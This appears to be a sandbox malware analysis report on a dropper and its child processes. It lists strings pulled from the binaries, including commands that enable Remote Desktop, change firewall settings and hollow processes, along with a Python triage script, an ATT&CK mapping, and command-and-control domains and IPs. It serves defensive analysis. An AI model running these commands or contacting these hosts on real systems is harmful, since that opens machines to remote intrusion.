fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: XO4ioEY3nq.exeString found in binary or memory: net start termservice
                          Source: XO4ioEY3nq.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 
Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe.0.drString found in binary or memory: net start termservice
                          Source: Gxtuum.exe.0.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 
Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
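The repeated "String found in binary or memory" entries above are the evidence behind the signature "Contains functionality to start a terminal service": `net start termservice`, the `fDenyTSConnections` value under `SYSTEM\CurrentControlSet\Control\Terminal Server` (0 allows Remote Desktop connections) and `netsh advfirewall` together describe switching RDP on, while `NtUnmapViewOfSection` resolved from `ntdll.dll` is the usual process-hollowing primitive. The following is an added example, not Joe Sandbox's signature engine (whose matching rules are not on this page): it pulls ASCII and UTF-16LE strings out of a buffer the way `strings -a` and `strings -el` would and tags these capabilities. The capability labels and the sample buffer are this example's own; the indicator strings are copied from the report.

```python
"""String-based capability triage for the indicators listed in the report."""
import re
import sys

# Indicator strings copied from the report's "String found in binary or memory"
# entries. The capability labels are this example's own, not Joe Sandbox names.
CAPABILITY_INDICATORS = {
    "enables_remote_desktop": [
        "net start termservice",                                # start TermService
        "fDenyTSConnections",                                   # 0 = allow RDP
        "SYSTEM\\CurrentControlSet\\Control\\Terminal Server",  # key holding it
    ],
    "modifies_firewall": ["netsh advfirewall"],
    "process_hollowing_api": ["NtUnmapViewOfSection"],
}


def extract_strings(data: bytes, min_len: int = 5) -> list[str]:
    """Return printable ASCII runs and UTF-16LE runs of at least min_len chars."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


def triage(data: bytes) -> dict[str, list[str]]:
    """Map each capability to the indicator strings actually present in data.

    A capability is reported when at least one of its indicators is found, and
    the list shows which ones, so the analyst can judge how strong the hit is
    (all three RDP strings together is a much better signal than one alone).
    """
    strings = extract_strings(data)
    hits = {}
    for capability, indicators in CAPABILITY_INDICATORS.items():
        matched = [ind for ind in indicators if any(ind in s for s in strings)]
        if matched:
            hits[capability] = matched
    return hits


# Constructed buffer standing in for a memory dump (not taken from the sample):
# ASCII and UTF-16LE strings separated by NUL padding, plus non-printable junk.
SAMPLE_DUMP = (
    b"MZ\x90\x00\x03\x00" * 4
    + b"net start termservice\x00\x00"
    + "fDenyTSConnections".encode("utf-16-le") + b"\x00\x00"
    + b"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\x00"
    + b"netsh advfirewall\x00"
    + b"NtUnmapViewOfSection\x00ntdll.dll\x00"
    + b"\xde\xad\xbe\xef" * 8
)

if __name__ == "__main__":
    # Usage: python triage.py <file-or-memory-dump>; defaults to the sample buffer.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for capability, matched in triage(blob).items():
        print(f"{capability}: {', '.join(matched)}")
```

Running it on a real process dump of Gxtuum.exe or the submitted file would reproduce the report's RDP and hollowing findings; the UTF-16LE pass matters because Windows binaries frequently carry registry paths and service names as wide strings that an ASCII-only `strings` misses.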
MITRE ATT&CK Matrix (one line per tactic, cells in the order the matrix shows them; a bracketed figure is the signature-count badge copied as rendered on the page, e.g. [2]; where the page shows several digits, e.g. [112], it is likely more than one badge run together; entries without a figure are the matrix's unflagged placeholder cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Process Injection [112]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [251]; Process Injection [112]; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [236]; Security Software Discovery [761]; Process Discovery [2]; Virtualization/Sandbox Evasion [251]; Application Window Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Desktop Protocol [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Screen Capture [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [113]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1627459; Sample: XO4ioEY3nq.exe; Startdate: 02/03/2025; Architecture: WINDOWS; Score: 100)

Contacted domains: towerbingobongoboom.com; cobolrationumelawrtewarms.com; 198.187.3.20.in-addr.arpa
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 9 other signatures

Process tree:
XO4ioEY3nq.exe (started)
    Dropped: C:\Users\user\AppData\Local\...\Gxtuum.exe (PE32); C:\Users\user\...\Gxtuum.exe:Zone.Identifier (ASCII)
    Signatures: Contains functionality to start a terminal service; Contains functionality to inject code into remote processes
    Gxtuum.exe (started by XO4ioEY3nq.exe)
        Network: cobolrationumelawrtewarms.com 107.189.27.66 (ports 49704, 49705, 49729; PONYNETUS, United States); 45.59.120.8 (ports 49706, 80; ANYNODEUS, United States)
        Dropped: C:\Users\user\AppData\...\rundrive.exe (PE32); C:\Users\user\AppData\...\rundrive[1].exe (PE32)
        Signatures: Multi AV Scanner detection for dropped file; Contains functionality to start a terminal service
        rundrive.exe (started by Gxtuum.exe)
            Dropped: C:\ProgramData\rcjuo\eafkou.exe (PE32)
            Signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements; 4 other signatures
eafkou.exe (started)
    Network: towerbingobongoboom.com 213.209.150.137 (ports 4000, 4783, 49751; KEMINETAL, Germany)
    Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to evade debugger and weak emulator (self modifying code); 4 other signatures
Gxtuum.exe (started)
4 other processes (started)

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.